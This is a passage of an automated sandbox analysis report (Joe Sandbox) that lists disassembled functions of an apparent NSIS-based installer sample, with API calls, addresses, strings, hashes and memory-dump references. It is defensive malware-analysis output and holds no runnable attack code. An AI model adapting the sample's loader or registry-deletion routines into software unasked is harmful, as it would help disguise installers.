API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-730719616
Opcode ID: ffb84532ba3a24a3ea8a32de3f89afa34c56be386775d3c5952a40cdf428d046
Instruction ID: c546ec396b89b09005d3c5f1d9b4a4bf58d4ceda60e07cc515ef6374c73a2cb0
Opcode Fuzzy Hash: ffb84532ba3a24a3ea8a32de3f89afa34c56be386775d3c5952a40cdf428d046
Instruction Fuzzy Hash: 07610471A04A02AAEF216F64DC847BF3B64DB51305F50813BE941B62D1D37C8A42DF9E

Function 00404053 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00404070
GetSysColor.USER32(00000000), ref: 0040408C
SetTextColor.GDI32(?,00000000), ref: 00404098
SetBkMode.GDI32(?,?), ref: 004040A4
GetSysColor.USER32(?), ref: 004040B7
SetBkColor.GDI32(?,?), ref: 004040C7
DeleteObject.GDI32(?), ref: 004040E1
CreateBrushIndirect.GDI32(?), ref: 004040EB

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction ID: 47825c477eeffae7bcc1b4b45db8633c52535f80fcd06c8b97140eed864a5805
Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction Fuzzy Hash: 0621A4B18047049BCB309F68DD08B4BBBF8AF40714F048639EA95F26E1C738E944CB65

Function 004026B3 Relevance: 10.6, APIs: 7, Instructions: 75memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00405982: GetFileAttributesA.KERNEL32(00000003,00402CBC,0042AC00,80000000,00000003), ref: 00405986
Part of subcall function 00405982: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8

GlobalAlloc.KERNEL32(?,?), ref: 004026D7
CloseHandle.KERNEL32(?), ref: 0040275D

Part of subcall function 004031CC: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402EA4,?), ref: 004031DA

GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 004026F3
GlobalFree.KERNEL32(?), ref: 0040272C
WriteFile.KERNEL32(?,00000000,?,?), ref: 0040273E
GlobalFree.KERNEL32(00000000), ref: 00402745

Part of subcall function 00402F1F: SetFilePointer.KERNEL32(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000,00409130,?), ref: 00402F45
Part of subcall function 00402F1F: WriteFile.KERNEL32(00000000,004128A0,?,000000FF,00000000,004128A0,00004000,00409130,00409130,?,?,00000000,00000000,?,?), ref: 00402FD2

DeleteFileA.KERNEL32(?), ref: 00402771

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: File$Global$AllocFreePointerWrite$AttributesCloseCreateDeleteHandle
String ID:
API String ID: 64603807-0
Opcode ID: 6cec495910a9e88075d1f7eb5e869c869e7b815a94df44103aaa50bb30bd6671
Instruction ID: 39d681308be84b49fc043c668352bfd213fb34ea520f048123e5f65a43450375
Opcode Fuzzy Hash: 6cec495910a9e88075d1f7eb5e869c869e7b815a94df44103aaa50bb30bd6671
Instruction Fuzzy Hash: 77218C71C00118BFCF116FA4CD88CAEBE79EF08364B10423AF520772E0C6795D419BA8

Function 00404FDC Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
lstrlenA.KERNEL32(00402C51,0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
lstrcatA.KERNEL32(0041F4D8,00402C51,00402C51,0041F4D8,00000000,00000000,00000000), ref: 00405038
SetWindowTextA.USER32(0041F4D8,0041F4D8), ref: 0040504A
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: cea32b253d1ac3703ad26de6388232052e4db73ad36ec02bf46cfe5f988bdfec
Instruction ID: 23c8d3588392bc678d7246373841442171ea5a50e124834ae8740ae97285bd87
Opcode Fuzzy Hash: cea32b253d1ac3703ad26de6388232052e4db73ad36ec02bf46cfe5f988bdfec
Instruction Fuzzy Hash: FD218C71900508BADB119FA5DD84ADFBFA9EF14354F14807AF504B6290C2799A41CFA8

Function 00402BDA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000), ref: 00402BF2
GetTickCount.KERNEL32 ref: 00402C10
wsprintfA.USER32 ref: 00402C3E

Part of subcall function 00404FDC: lstrlenA.KERNEL32(0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
Part of subcall function 00404FDC: lstrcatA.KERNEL32(0041F4D8,00402C51,00402C51,0041F4D8,00000000,00000000,00000000), ref: 00405038
Part of subcall function 00404FDC: SetWindowTextA.USER32(0041F4D8,0041F4D8), ref: 0040504A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C62
ShowWindow.USER32(00000000,00000005), ref: 00402C70

Part of subcall function 00402BBE: MulDiv.KERNEL32(?,?,?), ref: 00402BD3

Strings

... %d%%, xrefs: 00402C38

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: dd16a8e3e29a7078c9400af3a90b17e12947c4b40babff7d6952d3a04bc15912
Instruction ID: 37d10fed78b44bbf962512fa666ce1a12177f0d23356d60e90fa74daf698f4f0
Opcode Fuzzy Hash: dd16a8e3e29a7078c9400af3a90b17e12947c4b40babff7d6952d3a04bc15912
Instruction Fuzzy Hash: 900165B0949614ABDB216F64AE4DE9F7B78BB01701714C037FA01B11E1C6B8D541CB9E

Function 004048A7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048C2
GetMessagePos.USER32 ref: 004048CA
ScreenToClient.USER32(?,?), ref: 004048E4
SendMessageA.USER32(?,00001111,00000000,?), ref: 004048F6
SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040491C

Strings

f, xrefs: 004048F8

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction ID: add3c7f7873227bd74a4bce1351eac807b502806bceb4e0d6bae9f806a4b5eb6
Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction Fuzzy Hash: 61014C75D00218BAEB11DBA4DC85BFFBBBCAB55711F10412BBA10B62C0C7B4A9018BA5

Function 00402B42 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
wsprintfA.USER32 ref: 00402B91
SetWindowTextA.USER32(?,?), ref: 00402BA1
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3

Strings

unpacking data: %d%%, xrefs: 00402B7F
verifying installer: %d%%, xrefs: 00402B86, 00402B8F

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 99857fb9a0cb22b8e24de3565838d35ba34270d242ce7178ee6913b7a03a7076
Instruction ID: 1ce9201bfa48cab7b8fa553f1801af8382b39519b903b04a6adfa3bfa778fb21
Opcode Fuzzy Hash: 99857fb9a0cb22b8e24de3565838d35ba34270d242ce7178ee6913b7a03a7076
Instruction Fuzzy Hash: 0DF01D70900208ABEF215F61CD4ABEE3779EB00345F00803AFA06B51D0D7F8AA558B9A

Function 00405F5C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,00429000,0042A400,0042A400,00000000,004031EF,0042A400,77583410,004033C9), ref: 00405FB4
CharNextA.USER32(?,?,?,00000000), ref: 00405FC1
CharNextA.USER32(?,00429000,0042A400,0042A400,00000000,004031EF,0042A400,77583410,004033C9), ref: 00405FC6
CharPrevA.USER32(?,?,0042A400,0042A400,00000000,004031EF,0042A400,77583410,004033C9), ref: 00405FD6

Strings

*?|<>/":, xrefs: 00405FA4

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 8e6880dbf60680850995486114707e5442f3544b6a214aee6d9330f98436af3b
Instruction ID: 7b30a10291eb0396c8f4e95b118cc70be9f64314849ede57e52aca42a9cf7d7a
Opcode Fuzzy Hash: 8e6880dbf60680850995486114707e5442f3544b6a214aee6d9330f98436af3b
Instruction Fuzzy Hash: 9E11C451808B962AEB3216344C44F77BF99CF56760F18007BE9C4B22C2D67C5C429B6D

Function 0040173F Relevance: 7.6, APIs: 5, Instructions: 147stringtimeCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(00000000,00000000,004093C8,00429800,00000000,00000000,00000031), ref: 0040177E
CompareFileTime.KERNEL32(-00000014,?,004093C8,004093C8,00000000,00000000,004093C8,00429800,00000000,00000000,00000031), ref: 004017A8

Part of subcall function 00405CF1: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405CFE

Part of subcall function 00404FDC: lstrlenA.KERNEL32(0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
Part of subcall function 00404FDC: lstrcatA.KERNEL32(0041F4D8,00402C51,00402C51,0041F4D8,00000000,00000000,00000000), ref: 00405038
Part of subcall function 00404FDC: SetWindowTextA.USER32(0041F4D8,0041F4D8), ref: 0040504A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: e5c8897feeb3b96df54089b5182e8aadeaf99870982f07bb07acc14f8d7a8d61
Instruction ID: 6271ed47795bff7848a1184a65af423285d25a4990901b96ed448ffc086cd7e6
Opcode Fuzzy Hash: e5c8897feeb3b96df54089b5182e8aadeaf99870982f07bb07acc14f8d7a8d61
Instruction Fuzzy Hash: 4E41C371900615BBCF10BFA5DC46EAF3669DF41368B20823BF521B20E1D63C8A419B6D

Function 00402A3D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A5E
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
RegCloseKey.ADVAPI32(?), ref: 00402AA3
RegCloseKey.ADVAPI32(?), ref: 00402AC8
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b305445c74f0eaebb71fa9482cec2fce57418a6903f029cea569060b2a4f6aa
Instruction ID: 87201a58af63731299c065c60a73f314b5aa52cedce30dc2bb0b82caebebd8ee
Opcode Fuzzy Hash: 2b305445c74f0eaebb71fa9482cec2fce57418a6903f029cea569060b2a4f6aa
Instruction Fuzzy Hash: 7B114F71A00008FFDF219F90DE48EAA3B7DEB44349B104076FA05B11A0D7B59E55AF69

Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CD0
GetClientRect.USER32(00000000,?), ref: 00401CDD
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
DeleteObject.GDI32(00000000), ref: 00401D1B

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 729fc4278e862243959d7ad856f7c73244b6852cfe4ffc3fdd7b269795ac9902
Instruction ID: 68903ef9478fc0d920f95a79cd5396482650d24808bb52901199de5d2149753e
Opcode Fuzzy Hash: 729fc4278e862243959d7ad856f7c73244b6852cfe4ffc3fdd7b269795ac9902
Instruction Fuzzy Hash: 06F062B2A05114BFD701DBA4EE88CAF77BCEB44301B008576F501F2091C7389D019B79

Function 00401D26 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D29
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
ReleaseDC.USER32(?,00000000), ref: 00401D56
CreateFontIndirectA.GDI32(0040A7D0), ref: 00401DA1

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: ef1b64666616b25dcccf261ce108287f0db7ff00b6f9d57c68185c71429f3349
Instruction ID: 34424dcacaa19df80ac017e3b34477b9893efc0acb885e50cf323370767d2cbe
Opcode Fuzzy Hash: ef1b64666616b25dcccf261ce108287f0db7ff00b6f9d57c68185c71429f3349
Instruction Fuzzy Hash: 05011271948340AFE701DBB0AE0AB9A7F74EB19705F108435F141B72E2C6B954159B2F

Function 004047C5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0041FCF8,0041FCF8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,004046E5,000000DF,0000040F,00000400,00000000), ref: 00404853
wsprintfA.USER32 ref: 0040485B
SetDlgItemTextA.USER32(?,0041FCF8), ref: 0040486E

Strings

%u.%u%s%s, xrefs: 0040483D

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 7485b6386e81bef30f100a14aa500a9732bcfe78fc9357feba844f7cfa967d5f
Instruction ID: 1dbe8f306e20f990bcdfb4b2d97c48a080c9d40feb998d0653c6b80998781608
Opcode Fuzzy Hash: 7485b6386e81bef30f100a14aa500a9732bcfe78fc9357feba844f7cfa967d5f
Instruction Fuzzy Hash: CE11347360012437CB1062699C49EEF3249CBC2334F24823BFA25F71D1E9788C5282E8

Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30

Strings

!, xrefs: 00401BEC

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
Instruction ID: c8505a4ed1fbcfe48898eca751f608fe424cacc25c72cee6cab93c7adb8e4515
Opcode Fuzzy Hash: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
Instruction Fuzzy Hash: 742190B1A44208BFEF41AFB4CD4AAAE7BB5EF40344F14453EF541B61D1D6B89A40E728

Function 0040303A Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040304F

Part of subcall function 004031CC: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402EA4,?), ref: 004031DA

SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00402F52,?,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000), ref: 00403082
WriteFile.KERNEL32(0040A8A0,?,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,?,00000000,00000000,?,?), ref: 0040313C
SetFilePointer.KERNEL32(?,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,?,00000000,00000000,?,?,?,00402ECB), ref: 0040318E

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID:
API String ID: 2146148272-0
Opcode ID: e969f51fb91c1eed4d8a9bc9024c2eb0b6bf39f0f502a3b67258e99aab1be33f
Instruction ID: 2060b4db2a59e7e801be0a10e6f45457beaa1fbeaf8038f8ae1418eaad325724
Opcode Fuzzy Hash: e969f51fb91c1eed4d8a9bc9024c2eb0b6bf39f0f502a3b67258e99aab1be33f
Instruction Fuzzy Hash: 4B414F725052019FDB10BF29EE849663BFCFB4431A715863BE810BA2E4D7389952CB5E

Function 00401F68 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,?), ref: 00401F93

Part of subcall function 00404FDC: lstrlenA.KERNEL32(0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
Part of subcall function 00404FDC: lstrcatA.KERNEL32(0041F4D8,00402C51,00402C51,0041F4D8,00000000,00000000,00000000), ref: 00405038
Part of subcall function 00404FDC: SetWindowTextA.USER32(0041F4D8,0041F4D8), ref: 0040504A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

LoadLibraryExA.KERNEL32(00000000,?,?,00000001,?), ref: 00401FA3
GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,?,00000001,?), ref: 0040201D

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

